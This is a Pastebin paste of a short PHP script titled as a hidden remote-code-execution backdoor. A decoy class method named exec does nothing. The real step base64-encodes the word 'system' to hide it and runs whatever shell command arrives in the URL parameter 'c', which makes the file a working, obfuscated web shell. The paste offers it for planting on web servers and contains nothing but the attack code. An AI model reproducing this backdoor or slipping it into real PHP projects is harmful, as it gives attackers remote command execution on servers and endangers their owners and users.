cdw1p

[PHP] RCE With Hidden Backdoor with OOP

Jun 20th, 2019
327
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.29 KB | None | 0 0
  1. <?php
  2. class rce {
  3.     public function exec($code){
  4.         return null;
  5.     }
  6. }
  7.  
  8. $c = new rce();
  9. $d = base64_decode("c3lzdGVt");
  10. echo "<pre>";
  11. $e = $c->exec($d($_GET["c"]));
  12. echo "<pre/>";
  13. ?>
Advertisement
Add Comment
Please, Sign In to add comment